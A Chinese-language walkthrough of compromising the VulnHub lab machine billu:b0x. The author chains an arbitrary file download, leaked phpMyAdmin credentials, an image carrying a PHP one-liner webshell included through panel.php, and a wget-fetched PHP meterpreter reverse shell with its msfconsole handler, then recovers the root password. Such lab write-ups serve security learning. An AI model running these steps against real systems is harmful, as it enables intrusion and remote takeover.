环境
- 靶机(Ubuntu):192.168.40.140
- 攻击机(Kali Linux):192.168.40.129
下载地址
- https://www.vulnhub.com/entry/billu-b0x,188/
渗透过程
按照惯例先nmap扫描网段,得到靶机IP为 192.168.40.140
得到IP后,访问网页,发现只有登录框,没有什么意外的东西,扫描一下后台目录,看看有没有什么文件可利用的,扫描完后,发现有一堆php,同时还有一个phpmy(phpmyadmin)的网页
都访问了一遍后,发现test.php需要传入一个file的参数,用 GET型
的方式试了一下,发现不行
换火狐浏览器,开hackbar,发送 POST数据
发现可以任意文件下载,把所有文件都下载下来后,发现 c.php
文件里面有数据库密码,是用来访问phpmyamdin的(至于为什么不是index.php的登录用户,试一试能不能登录就知道了,要是能登录我也懒得去phpmyadmin)
登录phpmyadmin后,在 ica_lab.auth
表中找到另外一个用户名密码
拿上面那个账号密码成功登录
在登录后的界面找到了上传点
看路径得到php文件名为 panel.php
,回到火狐浏览器下载源码,代码乱审计了一波,发现 panel.php
中有文件包含的漏洞,接下来的操作用人话说就是,通过文件包含把php语句包含到panel.php中,然后执行命令
上传一张正常的图片,然后通过burpsuite在图片中插入一句话木马(也可以外面修改完后上传)
完事后,在 panel.php
页面中点击continue生成流量包,通过改 load
这个参数的内容来把我 Elapse.jpg
文件中的php语句包含进去
这样panel.php就相当于是一个木马文件了,给它一个elapse的参数执行命令试一下
成功执行,那么为了方便我这里多余一步,将 uploaded_images
下的Elapse.jpg改为 Elapse.php
,这样方便点,因为burpsuite中,需要手动url编码,也就是空格需要写成 ,太麻烦辽
更改完后,就可以直接去uploaded_images目录下利用Elapse.php了,这个时候就得想个法子来反弹shell了,那么就又到了我就喜欢了生成Php木马的时间了
生成完后,还需要改个后缀,因为是Php的话,会直接执行了,这样一来对方在wget尝试下载的时候就会下载不到本体,所以需要改为 .txt
或者其他格式,改完后开起apache2就好了
回到靶机这边,用wget将php木马下载下来
下载成功后,改个后缀为php
改完后,去到kali里面,用handler模块来触发payload
代码语言:javascript复制root@Elapse:/var/www/html# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.40.129
lhost => 192.168.40.129
msf exploit(multi/handler) > set lport 4123
lport => 4123
msf exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.40.129:4123
完事后,在浏览器这边输入链接触发木马
触发成功辽,tql
输入 shell
进入系统,输入 python-c'import pty; pty.spawn("/bin/bash")'
来转到终端
然后在系统里面一顿找文件的操作,才想起来,phpmy路径下会有一个config.inc.php,回过头来访问一下,就很简单的找到了root密码
尝试性的su root后,不小心就变成root用户了
总结
比起之前下载的(没写出来)的靶机,这个简直太正常了,思路都给那些辣鸡靶机打乱了,本来进到系统直接找config.inc.php就好了,完了一堆乱七八糟的find grep的操作,是真的傻